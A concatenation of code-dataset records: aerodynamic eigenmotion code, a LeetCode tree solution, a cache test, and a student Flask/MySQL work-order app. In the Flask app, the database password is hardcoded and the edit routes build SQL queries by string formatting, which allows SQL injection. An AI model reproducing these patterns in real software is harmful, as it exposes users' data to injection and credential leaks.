-2*mub*(Cnr+2*KZ2*CYb)\n coef_c = 4*mub*Cnb+CYb*Cnr\n\n eigenvalue = (self.__calc_eigenvalues(coef_a, coef_b, coef_c))[0][0]\n\n return eigenvalue*V/b, self.__calc_eigenvalue_properties(eigenvalue)\n\n def __calc_aperiodic_roll(self, t):\n mub, muc, CL, Cma, V = self.__get_flight_conditions(t)\n\n eigenvalue = (Clp/(4*mub*KX2))[0].astype(complex)\n\n return eigenvalue*V/b, self.__calc_eigenvalue_properties(eigenvalue)\n\n def __calc_spiral_motion(self, t):\n mub, muc, CL, Cma, V = self.__get_flight_conditions(t)\n\n eigenvalue = (2*CL*(Clb*Cnr-Cnb*Clr))/(Clp*(CYb*Cnr+4*mub*Cnb)-Cnp*(CYb*Clr+4*mub*Clb))[0].astype(complex)\n\n return eigenvalue*V/b, self.__calc_eigenvalue_properties(eigenvalue)\n\n\nif __name__ == \"__main__\":\n # eigenmotions_1 = Eigenmotions(time_spm=2772, time_phugoid=2864, time_dutch_roll=3067, time_aperiodic_roll=3310, time_spiral_motion=3391)\n eigenmotions_1 = Eigenmotions(time_spm=3635, time_phugoid=3237, time_dutch_roll=3717, time_aperiodic_roll=3550, time_spiral_motion=3920)\n\n print(\"-------- Symmetric motions --------\")\n\n print(\"\\nShort Period motion:\", eigenmotions_1.eigenvalue_spm)\n print(eigenmotions_1.prop_spm)\n\n print(\"\\nPhugoid:\", eigenmotions_1.eigenvalue_phugoid)\n print(eigenmotions_1.prop_phugoid)\n\n print(\"\\n-------- Asymmetric motions --------\")\n\n print(\"\\nDutch roll:\", eigenmotions_1.eigenvalue_dutch_roll)\n print(eigenmotions_1.prop_dutch_roll)\n\n print(\"\\nAperiodic roll:\", eigenmotions_1.eigenvalue_aperiodic_roll)\n print(eigenmotions_1.prop_aperiodic_roll)\n\n print(\"\\nSpiral motion:\", eigenmotions_1.eigenvalue_spiral_motion)\n print(eigenmotions_1.prop_spiral_motion)","repo_name":"LukeDeWaal/SVV2019FD","sub_path":"src/data_processing/analyticalmodel/symetrical_eigenmotions.py","file_name":"symetrical_eigenmotions.py","file_ext":"py","file_size_in_byte":5775,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"27002267773","text":"from collections import defaultdict\nfrom typing import Optional\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n # Time Complexity: O(n)\n # Space Complexity: O(n)\n # We will use a dictionary to store the leaves. 
We will use dfs to traverse the tree.\n    # If the node is None, we will return.\n    # If the node is a leaf, we will append the value to the leaves dictionary at the current level.\n    # We will then update the max level if the current level is greater than the max level.\n    # We will call dfs on the children with the current level + 1.\n    # We will return the sum of the leaves at the max level.\n    max_level = 1\n    def deepestLeavesSum(self, root: Optional[TreeNode]) -> int:\n        leaves = defaultdict(list)\n        def dfs(node, level):\n            if not node: \n                return\n            if not node.left and not node.right:\n                leaves[level].append(node.val)\n                self.max_level = max(level, self.max_level)\n            if node.right: \n                dfs(node.right, level + 1)\n            if node.left:\n                dfs(node.left, level + 1)\n            pass\n        dfs(root, 1)\n        return sum(leaves[self.max_level])","repo_name":"JaredBears/LeetCode","sub_path":"Python-Solutions/DeepestLeavesSum.py","file_name":"DeepestLeavesSum.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"27609400697","text":"import time\nfrom typing import Any\n\nfrom thunderstore.cache.cache import cache_function_result\nfrom thunderstore.cache.enums import CacheBustCondition\n\n\ndef test_cache_clear_with_args() -> None:\n    @cache_function_result(CacheBustCondition.background_update_only)\n    def get_time(cache_vary: Any) -> float:\n        return time.time()\n\n    first = get_time(\"test\")\n    time.sleep(0.01)\n    first_cached = get_time(\"test\")\n    second = get_time(\"test2\")\n    assert first == first_cached\n    assert second > first\n    time.sleep(0.01)\n    get_time.clear_cache_with_args(\"test\")\n    first_busted = get_time(\"test\")\n    assert first_busted > first\n    assert first_busted > second\n","repo_name":"thunderstore-io/Thunderstore","sub_path":"django/thunderstore/cache/tests/test_cache.py","file_name":"test_cache.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"77"} +{"seq_id":"75079221689","text":"# Project Step 6 (Portfolio Assignment - Group)\n# Juan Pablo Duque and Marco Scandroglio\n# Code Citation:\n# Date: 03/20/2023\n# Code adapted from Exploration 7 Course Content (Flask Starter App):\n# Source URL: https://github.com/osu-cs340-ecampus/flask-starter-app\n\n\nfrom flask import Flask, render_template, json, redirect, url_for\nfrom flask_mysqldb import MySQL\nfrom flask import request\nimport os\n\n\napp = Flask(__name__)\n\n# database connection\n# Template:\n# app.config[\"MYSQL_HOST\"] = \"classmysql.engr.oregonstate.edu\"\n# app.config[\"MYSQL_USER\"] = \"cs340_OSUusername\"\n# app.config[\"MYSQL_PASSWORD\"] = \"XXXX\" | last 4 digits of OSU id\n# app.config[\"MYSQL_DB\"] = \"cs340_OSUusername\"\n# app.config[\"MYSQL_CURSORCLASS\"] = \"DictCursor\"\n\n# database connection info\napp.config[\"MYSQL_HOST\"] = \"classmysql.engr.oregonstate.edu\"\napp.config[\"MYSQL_USER\"] = \"cs340_scandrom\"\napp.config[\"MYSQL_PASSWORD\"] = \"5497\"\napp.config[\"MYSQL_DB\"] = \"cs340_scandrom\"\napp.config[\"MYSQL_CURSORCLASS\"] = \"DictCursor\"\n\nmysql = MySQL(app)\n\n# Routes\n# have homepage route to /machines by default for convenience, generally this will be your home route with its own template\n''' ############################################################################################################################\nMACHINES 
ROUTES\n############################################################################################################################ '''\n\n@app.route(\"/\")\ndef home():\n return redirect(\"/machines\")\n\n\n# route for machines page\n@app.route(\"/machines\", methods=[\"POST\", \"GET\"])\ndef machines():\n # Separate out the request methods, in this case this is for a POST\n # insert a machine into the Machines entity\n if request.method == \"POST\":\n # fire off if user presses the Add Machine button\n if request.form.get(\"Add_Machine\"):\n # grab user form inputs\n year = request.form[\"year\"]\n make = request.form[\"make\"]\n model = request.form[\"model\"]\n serial = request.form[\"serial\"]\n # class is a python reserved word, so it was changed to clas. This has to be modified in the other files!!!!\n clas = request.form[\"class\"]\n\n # This table does no accept null inputs\n # WE HAVE AN ISSUE WITH CLASS (it is an attribute but it is a python reserved word). SHOULD WE CHANGE THIS ATTRIBUTE NAME? MAYBE TO Category?\n query = \"INSERT INTO Machines (year, make, model, serial, class) VALUES (%s, %s, %s, %s, %s);\"\n cur = mysql.connection.cursor()\n # Must pay attention when writing clas instead of class!!!\n cur.execute(query, (year, make, model, serial, clas))\n mysql.connection.commit()\n\n # redirect back to people page\n return redirect(\"/machines\")\n \n # Grab Machines data so we send it to our template to display\n if request.method == \"GET\":\n # mySQL query to grab all the machines in Machines\n query = \"SELECT Machines.machineId, Machines.year AS 'Year', Machines.make AS 'Make', Machines.model AS 'Model', Machines.serial AS 'Serial', Machines.class AS 'Class' FROM Machines;\"\n cur = mysql.connection.cursor()\n cur.execute(query)\n data = cur.fetchall()\n\n # render edit_machine page passing our query data to the edit_machine template\n return render_template(\"machines.j2\", data=data)\n\n# route for delete functionality, deleting a machine from Machines,\n# we want to pass the 'id' value of that machine on button click (see HTML) via the route\n@app.route(\"/delete_machines/\")\ndef delete_machines(machineId):\n # mySQL query to delete the person with our passed id\n query = \"DELETE FROM Machines WHERE machineId = '%s';\"\n cur = mysql.connection.cursor()\n cur.execute(query, (machineId,))\n mysql.connection.commit()\n\n # redirect back to people page\n return redirect(\"/machines\")\n\n# route for edit functionality, updating the attributes of a machine in Machines\n# similar to our delete route, we want to the pass the 'id' value of that machine on button click (see HTML) via the route\n@app.route(\"/edit_machines/\", methods=[\"POST\", \"GET\"])\ndef edit_machines(machineId):\n if request.method == \"GET\":\n # mySQL query to grab the info of the machine with our passed id\n query = \"SELECT * FROM Machines WHERE machineId = %s\" % (machineId)\n cur = mysql.connection.cursor()\n cur.execute(query)\n data = cur.fetchall()\n\n # render edit_machines page passing our query data edit_machines template\n return render_template(\"edit_machines.j2\", data=data)\n\n # meat and potatoes of our update functionality\n if request.method == \"POST\":\n # fire off if user clicks the 'Edit Machine' button\n if request.form.get(\"Edit_Machine\"):\n # grab user form inputs\n year = request.form[\"year\"]\n make = request.form[\"make\"]\n model = request.form[\"model\"]\n serial = request.form[\"serial\"]\n # class is a python reserved word, so it was changed to clas. 
This has to be modified in the other files!!!!\n clas = request.form[\"class\"]\n\n # This table does not accept null inputs\n query = \"UPDATE Machines SET Machines.year = %s, Machines.make = %s, Machines.model = %s, Machines.serial = %s, Machines.class = %s WHERE Machines.machineId = %s;\"\n cur = mysql.connection.cursor()\n cur.execute(query, (year, make, model, serial, clas, machineId))\n mysql.connection.commit()\n \n # redirect back to people page after we execute the update query\n return redirect(\"/machines\")\n\n''' ############################################################################################################################\nLOCATIONS ROUTES\n############################################################################################################################ '''\n\n# route for locations page\n@app.route(\"/locations\", methods=[\"POST\", \"GET\"])\ndef locations():\n # Separate out the request methods, in this case this is for a POST\n # insert a location into the Locations entity\n if request.method == \"POST\":\n # fire off if user presses the Add Location button\n if request.form.get(\"Add_Location\"):\n # grab user form inputs\n locationName = request.form[\"locationName\"]\n address = request.form[\"address\"]\n zipcode = request.form[\"zipcode\"]\n state = request.form[\"state\"]\n isClientLocation = request.form[\"isClientLocation\"]\n\n # This table does not accept null inputs\n query = \"INSERT INTO Locations (locationName, address, zipcode, state, isClientLocation) VALUES (%s, %s, %s, %s, %s);\"\n cur = mysql.connection.cursor()\n cur.execute(query, (locationName, address, zipcode, state, isClientLocation))\n mysql.connection.commit()\n\n # redirect back to people page\n return redirect(\"/locations\")\n \n\n # Grab Locations data so we send it to our template to display [IS THIS NECESSARY TO LEAVE IT????]\n if request.method == \"GET\":\n # mySQL query to grab all the locations in Locations\n query = \"SELECT Locations.locationId, Locations.locationName AS 'Location Name', Locations.address AS 'Address', Locations.zipcode AS 'Zipcode', Locations.state AS 'State', Locations.isClientLocation AS 'Client Location' FROM Locations;\"\n cur = mysql.connection.cursor()\n cur.execute(query)\n data = cur.fetchall()\n\n # render edit_machine page passing our query data to the edit_machine template (I DON´T THINK WE NEED EDIT FOR LOCATIONS) --> WE COULD DELETE THIS\n return render_template(\"locations.j2\", data=data)\n\n\n# route for delete functionality, deleting a location from Locations,\n# we want to pass the 'id' value of that location on button click (see HTML) via the route\n@app.route(\"/delete_locations/\")\ndef delete_locations(locationId):\n # mySQL query to delete the person with our passed id\n query = \"DELETE FROM Locations WHERE locationId = %s;\"\n cur = mysql.connection.cursor()\n cur.execute(query, (locationId,))\n mysql.connection.commit()\n\n # redirect back to people page\n return redirect(\"/locations\")\n\n# route for edit functionality, updating the attributes of a location in Locations\n# similar to our delete route, we want to the pass the 'id' value of that location on button click (see HTML) via the route\n@app.route(\"/edit_locations/\", methods=[\"POST\", \"GET\"])\ndef edit_locations(locationId):\n if request.method == \"GET\":\n # mySQL query to grab the info of the person with our passed id\n query = \"SELECT * FROM Locations WHERE locationId = %s;\" % (locationId)\n cur = mysql.connection.cursor()\n cur.execute(query)\n 
data = cur.fetchall()\n\n # render edit_locations page passing our query data edit_locations template\n return render_template(\"edit_locations.j2\", data=data)\n\n # meat and potatoes of our update functionality\n if request.method == \"POST\":\n # fire off if user clicks the 'Edit Location' button\n if request.form.get(\"Edit_Location\"):\n # grab user form inputs\n locationName = request.form[\"locationName\"]\n address = request.form[\"address\"]\n zipcode = request.form[\"zipcode\"]\n state = request.form[\"state\"]\n isClientLocation = request.form[\"isClientLocation\"]\n\n # This table does not accept null inputs\n query = \"UPDATE Locations SET Locations.locationName = %s, Locations.address = %s, Locations.zipcode = %s, Locations.state = %s, Locations.isClientLocation = %s WHERE Locations.locationId = %s;\"\n cur = mysql.connection.cursor()\n cur.execute(query, (locationName, address, zipcode, state, isClientLocation, locationId))\n mysql.connection.commit()\n \n # redirect back to locations page after we execute the update query\n return redirect(\"/locations\")\n\n''' ############################################################################################################################\nPRODUCTS ROUTES\n############################################################################################################################ '''\n\n# route for mechanics page\n@app.route(\"/products\", methods=[\"POST\", \"GET\"])\ndef products():\n # Separate out the request methods, in this case this is for a POST\n # insert a mechanic into the Mechanics entity\n if request.method == \"POST\":\n # fire off if user presses the Add Location button\n if request.form.get(\"Add_Product\"):\n # grab user form inputs\n productName = request.form[\"productName\"]\n reference = request.form[\"reference\"]\n brand = request.form[\"brand\"]\n description = request.form[\"description\"]\n\n # This table does no accept null inputs\n query = \"INSERT INTO Products (productName, reference, brand, description) VALUES (%s, %s,%s, %s);\"\n cur = mysql.connection.cursor()\n cur.execute(query, (productName, reference, brand, description))\n mysql.connection.commit()\n\n # redirect back to mechanics page\n return redirect(\"/products\")\n \n\n # Grab Products data so we send it to our template to display\n if request.method == \"GET\":\n # mySQL query to grab all the machines in Machines\n query = \"SELECT productId, productName AS 'Product Name', reference AS 'Reference', brand AS 'Brand', description AS 'Description' FROM Products;\"\n cur = mysql.connection.cursor()\n cur.execute(query)\n data = cur.fetchall()\n\n # render edit_machine page passing our query data to the edit_machine template (I DON´T THINK WE NEED EDIT FOR LOCATIONS) --> WE COULD DELETE THIS\n return render_template(\"products.j2\", data=data)\n\n\n# route for delete functionality, deleting a product from Products,\n# we want to pass the 'id' value of that product on button click (see HTML) via the route\n@app.route(\"/delete_product/\")\ndef delete_product(productId):\n # mySQL query to delete the product with our passed id\n query = \"DELETE FROM Products WHERE productId = %s;\"\n cur = mysql.connection.cursor()\n cur.execute(query, (productId,))\n mysql.connection.commit()\n\n # redirect back to products page\n return redirect(\"/products\")\n\n# route for edit functionality, updating the attributes of a product in Products\n# similar to our delete route, we want to the pass the 'id' value of that product on button click (see HTML) via 
the route\n@app.route(\"/edit_products/\", methods=[\"POST\", \"GET\"])\ndef edit_products(productId):\n if request.method == \"GET\":\n # mySQL query to grab the info of the product with our passed id\n query = \"SELECT * FROM Products WHERE productId = %s;\" % (productId)\n cur = mysql.connection.cursor()\n cur.execute(query)\n data = cur.fetchall()\n\n # render edit_products page passing our query data edit_products template\n return render_template(\"edit_products.j2\", data=data)\n\n # meat and potatoes of our update functionality\n if request.method == \"POST\":\n # fire off if user clicks the 'Edit Product' button\n if request.form.get(\"Edit_Product\"):\n # grab user form inputs\n productName = request.form[\"productName\"]\n reference = request.form[\"reference\"]\n brand = request.form[\"brand\"]\n description = request.form[\"description\"]\n\n # This table does not accept null inputs\n query = \"UPDATE Products SET Products.productName = %s, Products.reference = %s, Products.brand = %s, Products.description = %s WHERE Products.productId = %s;\"\n cur = mysql.connection.cursor()\n cur.execute(query, (productName, reference, brand, description, productId))\n mysql.connection.commit()\n \n # redirect back to locations page after we execute the update query\n return redirect(\"/products\")\n\n\n''' ############################################################################################################################\nMECHANICS ROUTES\n############################################################################################################################ '''\n\n# route for mechanics page\n@app.route(\"/mechanics\", methods=[\"POST\", \"GET\"])\ndef mechanics():\n # Separate out the request methods, in this case this is for a POST\n # insert a mechanic into the Mechanics entity\n if request.method == \"POST\":\n # fire off if user presses the Add Location button\n if request.form.get(\"Add_Mechanic\"):\n # grab user form inputs\n firstName = request.form[\"firstName\"]\n lastName = request.form[\"lastName\"]\n phone = request.form[\"phone\"]\n email = request.form[\"email\"]\n\n # This table does no accept null inputs\n query = \"INSERT INTO Mechanics (firstName, lastName, phone, email) VALUES (%s, %s, %s, %s);\"\n cur = mysql.connection.cursor()\n cur.execute(query, (firstName, lastName, phone, email))\n mysql.connection.commit()\n\n # redirect back to mechanics page\n return redirect(\"/mechanics\")\n \n\n # Grab Mechanics data so we send it to our template to display [IS THIS NECESSARY TO LEAVE IT????\n # ]\n if request.method == \"GET\":\n # mySQL query to grab all the machines in Machines\n query = \"SELECT Mechanics.mechanicId, Mechanics.firstName AS 'First Name', Mechanics.lastName AS 'Last Name', Mechanics.phone AS 'Phone Number', Mechanics.email AS 'Email Address' FROM Mechanics;\"\n cur = mysql.connection.cursor()\n cur.execute(query)\n data = cur.fetchall()\n\n # render edit_machine page passing our query data to the edit_machine template (I DON´T THINK WE NEED EDIT FOR LOCATIONS) --> WE COULD DELETE THIS\n return render_template(\"mechanics.j2\", data=data)\n\n\n# route for delete functionality, deleting a mechanic from Mechanics,\n# we want to pass the 'id' value of that Mechanic on button click (see HTML) via the route\n@app.route(\"/delete_mechanics/\")\ndef delete_mechanics(mechanicId):\n # mySQL query to delete the person with our passed id\n query = \"DELETE FROM Mechanics WHERE mechanicId = %s;\"\n cur = mysql.connection.cursor()\n cur.execute(query, 
(mechanicId,))\n mysql.connection.commit()\n\n # redirect back to people page\n return redirect(\"/mechanics\")\n\n# route for edit functionality, updating the attributes of a mechanic in Mechanics\n# similar to our delete route, we want to the pass the 'id' value of that mechanic on button click (see HTML) via the route\n@app.route(\"/edit_mechanics/\", methods=[\"POST\", \"GET\"])\ndef edit_mechanics(mechanicId):\n if request.method == \"GET\":\n # mySQL query to grab the info of the person with our passed id\n query = \"SELECT * FROM Mechanics WHERE mechanicId = %s;\" % (mechanicId)\n cur = mysql.connection.cursor()\n cur.execute(query)\n data = cur.fetchall()\n\n # render edit_mechanics page passing our query data edit_mechanics template\n return render_template(\"edit_mechanics.j2\", data=data)\n\n # meat and potatoes of our update functionality\n if request.method == \"POST\":\n # fire off if user clicks the 'Edit Location' button\n if request.form.get(\"Edit_Mechanic\"):\n # grab user form inputs\n firstName = request.form[\"firstName\"]\n lastName = request.form[\"lastName\"]\n phone = request.form[\"phone\"]\n email = request.form[\"email\"]\n\n # This table does not accept null inputs\n query = \"UPDATE Mechanics SET Mechanics.firstName = %s, Mechanics.lastName = %s, Mechanics.phone = %s, Mechanics.email = %s WHERE Mechanics.mechanicId = %s;\"\n cur = mysql.connection.cursor()\n cur.execute(query, (firstName, lastName, phone, email, mechanicId))\n mysql.connection.commit()\n \n # redirect back to locations page after we execute the update query\n return redirect(\"/mechanics\")\n \n''' ############################################################################################################################\nWORK ORDER ROUTES\n############################################################################################################################ '''\n\n# route for work orders page\n@app.route(\"/workorders\", methods=[\"POST\", \"GET\"])\ndef workOrders():\n # Separate out the request methods, in this case this is for a POST\n # insert a work order into the WorkOrders entity\n if request.method == \"POST\":\n # fire off if user presses the Add Person button\n if request.form.get(\"Add_Work_Order\"):\n # grab user form inputs\n machineId = request.form[\"serial\"]\n locationId = request.form[\"locationId\"]\n date = request.form[\"date\"]\n description = request.form[\"description\"]\n\n # account for null locationId\n if locationId == \"0\":\n # mySQL query to insert a new work order into WorkOrders with our form inputs\n # query = \"INSERT INTO WorkOrders (machineId, date, description) VALUES ((SELECT machineId FROM Machines WHERE serial = %s), %s, %s)\" \n query = \"INSERT INTO WorkOrders (machineId, date, description) VALUES (%s, %s, %s)\" \n cur = mysql.connection.cursor()\n cur.execute(query, (machineId, date, description))\n mysql.connection.commit()\n\n # no null inputs\n else:\n # query = \"INSERT INTO WorkOrders (machineId, locationId, date, description) VALUES ((SELECT machineId FROM Machines WHERE serial = %s), %s, %s, %s)\"\n query = \"INSERT INTO WorkOrders (machineId, locationId, date, description) VALUES (%s, %s, %s, %s)\"\n cur = mysql.connection.cursor()\n cur.execute(query, (machineId, locationId, date, description))\n mysql.connection.commit()\n\n # redirect back to people page\n return redirect(\"/workorders\")\n\n # Grab workOrders data so we send it to our template to display\n if request.method == \"GET\":\n # mySQL query to grab all the work orders in 
workOrders\n query = (\"SELECT WorkOrders.workOrderId, \" \n \"Machines.model AS 'Machine Model', Machines.serial AS 'Machine Serial', Locations.locationName AS 'Location Name', WorkOrders.date AS 'Date', WorkOrders.description AS 'Description'\"\n \"FROM WorkOrders \" \n \"LEFT JOIN Machines ON WorkOrders.machineId = Machines.machineId \" \n \"LEFT JOIN Locations ON WorkOrders.locationId = Locations.locationId\")\n cur = mysql.connection.cursor()\n cur.execute(query)\n data = cur.fetchall()\n\n machine_dropdown_query = \"SELECT machineId, serial FROM Machines;\"\n cur = mysql.connection.cursor()\n cur.execute(machine_dropdown_query)\n machine_dropdown_data = cur.fetchall()\n\n location_dropdown_query = \"SELECT locationId, locationName FROM Locations;\"\n cur = mysql.connection.cursor()\n cur.execute(location_dropdown_query)\n location_dropdown_data = cur.fetchall()\n\n # render edit_people page passing our query data and homeworld data to the edit_people template\n return render_template(\"workorders.j2\", data=data, machine_dropdown_data=machine_dropdown_data, location_dropdown_data=location_dropdown_data)\n\n\n# route for delete functionality, deleting a work order from WorkOrders,\n# we want to pass the 'id' value of that work order on button click (see HTML) via the route\n@app.route(\"/delete_workorder/\")\ndef delete_workorder(workOrderId):\n # mySQL query to delete the person with our passed id\n query = \"DELETE FROM WorkOrders WHERE workOrderId = '%s';\"\n cur = mysql.connection.cursor()\n cur.execute(query, (workOrderId,))\n mysql.connection.commit()\n\n # redirect back to people page\n return redirect(\"/workorders\")\n\n\n''' ############################################################################################################################\nWORK ORDER DETAILS ROUTES\n############################################################################################################################ '''\n\n# route for work order details page\n@app.route(\"/workorderdetails/\", methods=[\"POST\", \"GET\"])\ndef workorder_details(workOrderId):\n\n if request.method == \"POST\":\n \n if request.form.get(\"Update_Work_Order\"):\n # grab user form inputs\n machineId = request.form[\"serial\"]\n locationId = request.form[\"locationId\"]\n date = request.form[\"date\"]\n description = request.form[\"description\"]\n\n # account for null locationId\n if locationId == \"0\":\n # mySQL query to insert a new work order into WorkOrders with our form inputs\n # query = \"INSERT INTO WorkOrders (machineId, date, description) VALUES ((SELECT machineId FROM Machines WHERE serial = %s), %s, %s)\" \n query = \"UPDATE WorkOrders SET machineId = %s, date = %s, description = %s WHERE workOrderId = %s;\" \n cur = mysql.connection.cursor()\n cur.execute(query, (machineId, date, description, workOrderId))\n mysql.connection.commit()\n\n # no null inputs\n else:\n # query = \"INSERT INTO WorkOrders (machineId, locationId, date, description) VALUES ((SELECT machineId FROM Machines WHERE serial = %s), %s, %s, %s)\"\n query = \"UPDATE WorkOrders SET machineId = %s, locationId = %s, date = %s, description = %s WHERE workOrderId = %s;\"\n cur = mysql.connection.cursor()\n cur.execute(query, (machineId, locationId, date, description, workOrderId))\n mysql.connection.commit()\n\n # redirect to work order details page\n current_url = request.referrer or url_for('index')\n return redirect(current_url)\n\n if request.form.get(\"Add_Product\"):\n\n productId = request.form[\"reference\"]\n add_product_query = 
\"INSERT INTO WorkOrderProducts (workOrderId, productId) VALUES (%s, %s);\"\n cur = mysql.connection.cursor()\n cur.execute(add_product_query, (workOrderId, productId,))\n mysql.connection.commit()\n\n # redirect to work order details page\n current_url = request.referrer or url_for('index')\n return redirect(current_url)\n\n if request.form.get(\"Add_Mechanic\"):\n \n mechanicId = request.form[\"email\"]\n add_mechanic_query = \"INSERT INTO WorkOrderMechanics (workOrderId, mechanicId) VALUES (%s, %s);\"\n cur = mysql.connection.cursor()\n cur.execute(add_mechanic_query, (workOrderId, mechanicId))\n mysql.connection.commit()\n\n # redirect back to work order mechanic page\n current_url = request.referrer or url_for('index')\n return redirect(current_url)\n\n\n # Grab workOrderProducts data so we send it to our template to display\n if request.method == \"GET\":\n\n # work orders queries\n workorder_query = (\"SELECT WorkOrders.workOrderId,\" \n \"Machines.model AS 'Machine Model', Machines.serial AS 'Machine Serial', Locations.locationName AS 'Location Name', WorkOrders.date AS 'Date', WorkOrders.description AS 'Description'\"\n \"FROM WorkOrders \" \n \"LEFT JOIN Machines ON WorkOrders.machineId = Machines.machineId \" \n \"LEFT JOIN Locations ON WorkOrders.locationId = Locations.locationId \"\n \"WHERE WorkOrders.workOrderId = %s;\")\n cur = mysql.connection.cursor()\n cur.execute(workorder_query, (workOrderId,))\n workorder_data = cur.fetchall()\n\n # queries for work order update form\n machine_dropdown_query = \"SELECT machineId, serial FROM Machines;\"\n cur = mysql.connection.cursor()\n cur.execute(machine_dropdown_query)\n machine_dropdown_data = cur.fetchall()\n\n location_dropdown_query = \"SELECT locationId, locationName FROM Locations;\"\n cur = mysql.connection.cursor()\n cur.execute(location_dropdown_query)\n location_dropdown_data = cur.fetchall()\n\n # products queries\n products_query = (\"SELECT WorkOrderProducts.workOrderProductId, Products.productId, Products.productName AS 'Product Name', Products.reference AS 'Product Reference' \"\n \"FROM WorkOrderProducts \"\n \"JOIN Products ON WorkOrderProducts.productId = Products.productId \"\n \"WHERE WorkOrderProducts.workOrderId = %s;\")\n cur = mysql.connection.cursor()\n cur.execute(products_query, (workOrderId,))\n products_data = cur.fetchall()\n\n products_dropdown_query = \"SELECT productId, reference FROM Products;\"\n cur = mysql.connection.cursor()\n cur.execute(products_dropdown_query)\n products_drp_dwn = cur.fetchall()\n\n # check if there are any records in the workorderproducts intersection table for this work order\n products_message = None\n\n if not products_data:\n products_message = \"There are no products assigned to this work order yet.\"\n \n # mechanics queries\n # mySQL query to grab all the work order mechanics in the work Order\n mechanics_query = (\"SELECT WorkOrderMechanics.workOrderMechanicId, Mechanics.firstName AS 'First Name', Mechanics.lastName AS 'Last Name' FROM WorkOrderMechanics\\\n JOIN Mechanics ON WorkOrderMechanics.mechanicId = Mechanics.mechanicId\\\n WHERE WorkOrderMechanics.workOrderId = %s;\")\n cur = mysql.connection.cursor()\n cur.execute(mechanics_query, (workOrderId,))\n mechanics_data = cur.fetchall()\n\n mechanics_dropdown_query = (\"SELECT Mechanics.* \"\n \"FROM Mechanics \"\n \"LEFT JOIN WorkOrderMechanics ON Mechanics.mechanicId = WorkOrderMechanics.mechanicId \"\n \"AND WorkOrderMechanics.workOrderId = %s \"\n \"WHERE WorkOrderMechanics.workOrderId IS NULL;\")\n cur = 
mysql.connection.cursor()\n cur.execute(mechanics_dropdown_query, (workOrderId,))\n mechanics_drp_dwn = cur.fetchall()\n\n # check if there are any records in the workordermechanics intersection table for this work order\n mechanics_message = None\n if not mechanics_data:\n mechanics_message = \"There are no mechanics assigned to this work order yet.\"\n\n # render work order products page passing our query data to the template\n # workOrderId is passed to the template so it is defined in the action for the form\n return render_template(\"workorder_details.j2\", workorder_data=workorder_data, workOrderId=workOrderId,\n machine_dropdown_data=machine_dropdown_data, location_dropdown_data=location_dropdown_data,\n products_data=products_data, products_message=products_message, products_drp_dwn=products_drp_dwn,\n mechanics_data=mechanics_data, mechanics_message=mechanics_message, mechanics_drp_dwn=mechanics_drp_dwn\n )\n\n\n@app.route(\"/workorderdetails/delete_workorder/\")\ndef delete_workorder_details(workOrderId):\n # mySQL query to delete the person with our passed id\n query = \"DELETE FROM WorkOrders WHERE workOrderId = '%s';\"\n cur = mysql.connection.cursor()\n cur.execute(query, (workOrderId,))\n mysql.connection.commit()\n\n # redirect back to people page\n return redirect(\"/workorders\")\n\n\n# route for delete functionality, deleting a product from a work order,\n# we want to pass the 'workOrderProductId' value of that product on button click (see HTML) via the route\n@app.route(\"/productdetails/delete_product/\")\ndef delete_product_from_work_order(workOrderProductId):\n # mySQL query to delete the product with our passed id\n query = \"DELETE FROM WorkOrderProducts WHERE workOrderProductId = '%s';\"\n cur = mysql.connection.cursor()\n cur.execute(query, (workOrderProductId,))\n mysql.connection.commit()\n\n # redirect to current page\n current_url = request.referrer or url_for('index')\n return redirect(current_url)\n\n\n# route for delete functionality, deleting a mechanic from a work order,\n# we want to pass the 'workOrderMechanicId' value of that mechanic on button click (see HTML) via the route\n@app.route(\"/mechanicdetails/delete_mechanics/\") \ndef delete_workorderMechanics(workOrderMechanicId ):\n # mySQL query to delete the mechanic with our passed id\n query = \"DELETE FROM WorkOrderMechanics WHERE workOrderMechanicId = %s;\"\n cur = mysql.connection.cursor()\n cur.execute(query, (workOrderMechanicId,))\n mysql.connection.commit()\n\n # redirect to current page\n current_url = request.referrer or url_for('index')\n return redirect(current_url)\n\n\n@app.errorhandler(500)\ndef internal_server_error(error):\n return render_template('500.html'), 500\n\n\n# Listener\n# change the port number if deploying on the flip servers\nif __name__ == \"__main__\":\n app.run(port=11238, debug=True)\n\n","repo_name":"juanpabloduqueo/github-helloearth","sub_path":"hello_earth_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":31623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28242239413","text":"from __future__ import division, absolute_import, print_function\n\nimport os\n\nimport torch\n\nimport eval\nimport aoanet.misc.utils as misc_utils\nimport aoanet.eval_utils as eval_utils\n\n\ndef save_checkpoint(model, infos, optimizer, opt, histories=None, append=''):\n if len(append) > 0:\n append = '-' + append\n # if checkpoint_path doesn't exist\n if not os.path.isdir(opt.checkpoint_path):\n 
os.makedirs(opt.checkpoint_path)\n checkpoint_path = os.path.join(opt.checkpoint_path, 'model%s.pth' % append)\n torch.save(model.state_dict(), checkpoint_path)\n print(\"model saved to {}\".format(checkpoint_path))\n optimizer_path = os.path.join(opt.checkpoint_path, 'model_optimizer%s.pth' % append)\n torch.save(optimizer.state_dict(), optimizer_path)\n with open(os.path.join(opt.checkpoint_path, 'infos_' + opt.id + '%s.pkl' % append), 'wb') as f:\n misc_utils.pickle_dump(infos, f)\n if histories:\n with open(os.path.join(opt.checkpoint_path, 'histories_' + opt.id + '%s.pkl' % append), 'wb') as f:\n misc_utils.pickle_dump(histories, f)\n\n\ndef load_record(opt):\n # open old infos and check if models are compatible\n with open(os.path.join(opt.start_from, 'infos_' + opt.id + '.pkl'), 'rb') as f:\n infos = misc_utils.pickle_load(f)\n saved_model_opt = infos['opt']\n need_be_same = [\"caption_model\", \"rnn_type\", \"rnn_size\", \"num_layers\"]\n for checkme in need_be_same:\n assert vars(saved_model_opt)[checkme] == vars(opt)[checkme], \\\n \"Command line argument and saved model disagree on '%s' \" % checkme\n\n if os.path.isfile(os.path.join(opt.start_from, 'histories_' + opt.id + '.pkl')):\n with open(os.path.join(opt.start_from, 'histories_' + opt.id + 